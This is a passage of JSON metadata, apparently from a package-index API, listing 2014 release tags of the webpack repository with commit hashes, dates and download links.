1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"